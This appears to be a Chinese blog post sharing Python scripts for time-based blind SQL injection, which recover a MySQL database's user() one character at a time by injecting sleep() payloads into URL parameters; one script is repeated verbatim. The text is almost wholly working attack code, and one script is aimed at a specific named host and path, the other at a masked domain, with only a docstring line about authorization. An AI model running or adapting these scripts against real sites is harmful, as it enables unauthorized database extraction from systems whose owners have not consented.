• 时间盲注脚本.py


    时间盲注脚本

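     #!/usr/bin/env python
     # -*- coding: utf-8 -*-
     """Time-based blind SQL injection: recover MySQL user() one character at a time.

     Each request asks the backend "is character i of user() equal to X?"; a true
     answer is signalled by an injected sleep() delaying the response.
     Only run this against systems you are explicitly authorized to test.
     """
     import time

     import requests

     # Target page; the injection point is the ``fid`` query parameter.
     TARGET = 'http://XXXXX.cn/default.php'
     # Candidate characters tried at every position (MySQL user() is typically
     # name@host). The original list was missing 'j' ("...ghig..."), so that
     # letter could never be recovered.
     payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
     # Upper bound on len(user()); extraction stops at the first position where
     # no candidate matches.
     MAX_LENGTH = 22
     # Delay injected on a true comparison, the elapsed time counted as a hit,
     # and the client timeout. Keep HIT_THRESHOLD well above normal latency
     # (jitter otherwise yields false positives) and below SLEEP_SECONDS.
     SLEEP_SECONDS = 20
     HIT_THRESHOLD = 15
     REQUEST_TIMEOUT = 30
     # Payload template. The ``/* ... */`` wrapper and the paired quotes keep it
     # valid whether ``fid`` lands in a single- or double-quoted string; in a
     # bare numeric context the probe sits inside the comment and never fires.
     # Both branches of the outer if() calls are sleep(0)/0, so they add no
     # delay of their own.
     PROBE = ("1-if(now()<sysdate(),sleep(0),0)"
              "/*'XOR(if(ascii(substring(user(),%d,1))=%d,sleep(%d),0))OR'"
              "\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/")


     def probe(position, char):
         """Return True when the server confirms ``char`` at ``position`` of user().

         A hit is an elapsed time above HIT_THRESHOLD, or a request timeout
         (the injected sleep plus network latency exceeded REQUEST_TIMEOUT);
         the original crashed on a timeout instead of counting it.
         """
         url = '%s?fid=%s' % (TARGET, PROBE % (position, ord(char), SLEEP_SECONDS))
         started = time.time()
         try:
             requests.get(url, timeout=REQUEST_TIMEOUT)
         except requests.exceptions.Timeout:
             return True
         return time.time() - started > HIT_THRESHOLD


     def retrieve_user():
         """Extract user() character by character and return what was found.

         A hit is re-probed once before it is accepted, so a single slow
         response (network jitter, server load) is not recorded as a match.
         """
         user = ''
         print('Start to retrive current user:')
         for position in range(1, MAX_LENGTH + 1):
             for char in payloads:
                 if probe(position, char) and probe(position, char):
                     user += char    # the original assigned here, keeping only the last char
                     print('user is: %s' % user)
                     break
             else:
                 # No candidate matched: end of the string, or a character outside
                 # ``payloads`` (the result is then truncated at this point).
                 break
         print('\n[Done] current user is %s' % user)
         return user


     if __name__ == '__main__':
         retrieve_user()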
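    #encoding=utf-8
    """Time-based blind SQL injection: recover MySQL user() via client timeouts.

    Each request injects ``if(<char test>, sleep(N), 0)`` into ``corp_id``; a
    true test stalls the response past the client timeout, and that timeout is
    the signal. Run only against systems you are explicitly authorized to test.
    """
    import httplib
    import random
    import socket
    import string
    import sys
    import time
    import urllib

    headers = {}    # unused; kept from the original script
    # Target host and injection point (originally hard-coded inline).
    TARGET_HOST = 'kact.kingdee.com'
    TARGET_PATH = '/world/createArticle'
    # Candidate characters. The probe compares against lower(user()), so the
    # upper-case candidates of the original list ('A'..'T') could never match
    # and only cost a request each; they are dropped.
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    # Upper bound on len(user()) (the original loop assumed a length of 20).
    MAX_LENGTH = 20
    # A hit is detected as a client timeout, so the injected sleep must be at
    # least as long as the timeout; a bigger margin reduces false negatives
    # (a missed character is silently skipped). Both were 3 in the original.
    SLEEP_SECONDS = 3
    CLIENT_TIMEOUT = 3


    def probe(position, char):
        """Return True when probing ``char`` at ``position`` of user() times out.

        Only ``socket.timeout`` counts as a hit. The original bare ``except:``
        also turned DNS failures, refused/reset connections and even Ctrl-C
        into "matched" characters; those errors now propagate. A legitimately
        slow response still reads as a hit, so re-run to confirm the result.
        """
        test = "ascii(mid(lower(user()),%s,1))=%s" % (position, ord(char))
        injected = "aaa'XOR(if(%s,sleep(%d),0))OR'bbb" % (test, SLEEP_SECONDS)
        conn = httplib.HTTPConnection(TARGET_HOST, timeout=CLIENT_TIMEOUT)
        try:
            conn.request(method='GET',
                         url="%s?corp_id=%s" % (TARGET_PATH, urllib.quote(injected)))
            conn.getresponse()
        except socket.timeout:
            return True
        finally:
            conn.close()    # the original never closed the connection on a timeout
        return False


    def retrieve_user():
        """Recover user() one character at a time and return the result."""
        print('[%s] Start to retrive MySQL User:'
              % time.strftime('%H:%M:%S', time.localtime()))
        user = ''
        for position in range(1, MAX_LENGTH + 1):
            for char in payloads:
                if probe(position, char):
                    user += char
                    sys.stdout.write('\n[in progress] %s' % user)
                    sys.stdout.flush()
                    # Pause after a hit, as the original did -- presumably so the
                    # server-side sleep() has finished before the next probe.
                    time.sleep(3.0)
                    break
                sys.stdout.write('.')    # progress marker for a non-match
                sys.stdout.flush()
            else:
                # No candidate matched: end of the string, or a character outside
                # ``payloads`` (the result is then truncated at this point).
                break
        print('\n[Done] MySQL user is %s' % user)
        return user


    if __name__ == '__main__':
        retrieve_user()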
    

      

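    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    """Time-based blind SQL injection: recover MySQL user() one character at a time.

    Each request asks the backend "is character i of user() equal to X?"; a true
    answer is signalled by an injected sleep() delaying the response.
    Only run this against systems you are explicitly authorized to test.
    """
    import time

    import requests

    # Target page; the injection point is the ``fid`` query parameter.
    TARGET = 'http://XXXXX.cn/default.php'
    # Candidate characters tried at every position (MySQL user() is typically
    # name@host). The original list was missing 'j' ("...ghig..."), so that
    # letter could never be recovered.
    payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
    # Upper bound on len(user()); extraction stops at the first position where
    # no candidate matches.
    MAX_LENGTH = 22
    # Delay injected on a true comparison, the elapsed time counted as a hit,
    # and the client timeout. Keep HIT_THRESHOLD well above normal latency
    # (jitter otherwise yields false positives) and below SLEEP_SECONDS.
    SLEEP_SECONDS = 20
    HIT_THRESHOLD = 15
    REQUEST_TIMEOUT = 30
    # Payload template. The ``/* ... */`` wrapper and the paired quotes keep it
    # valid whether ``fid`` lands in a single- or double-quoted string; in a
    # bare numeric context the probe sits inside the comment and never fires.
    # Both branches of the outer if() calls are sleep(0)/0, so they add no
    # delay of their own.
    PROBE = ("1-if(now()<sysdate(),sleep(0),0)"
             "/*'XOR(if(ascii(substring(user(),%d,1))=%d,sleep(%d),0))OR'"
             "\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/")


    def probe(position, char):
        """Return True when the server confirms ``char`` at ``position`` of user().

        A hit is an elapsed time above HIT_THRESHOLD, or a request timeout
        (the injected sleep plus network latency exceeded REQUEST_TIMEOUT);
        the original crashed on a timeout instead of counting it.
        """
        url = '%s?fid=%s' % (TARGET, PROBE % (position, ord(char), SLEEP_SECONDS))
        started = time.time()
        try:
            requests.get(url, timeout=REQUEST_TIMEOUT)
        except requests.exceptions.Timeout:
            return True
        return time.time() - started > HIT_THRESHOLD


    def retrieve_user():
        """Extract user() character by character and return what was found.

        A hit is re-probed once before it is accepted, so a single slow
        response (network jitter, server load) is not recorded as a match.
        """
        user = ''
        print('Start to retrive current user:')
        for position in range(1, MAX_LENGTH + 1):
            for char in payloads:
                if probe(position, char) and probe(position, char):
                    user += char    # the original assigned here, keeping only the last char
                    print('user is: %s' % user)
                    break
            else:
                # No candidate matched: end of the string, or a character outside
                # ``payloads`` (the result is then truncated at this point).
                break
        print('\n[Done] current user is %s' % user)
        return user


    if __name__ == '__main__':
        retrieve_user()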

  • 原文地址:https://www.cnblogs.com/nul1/p/8537196.html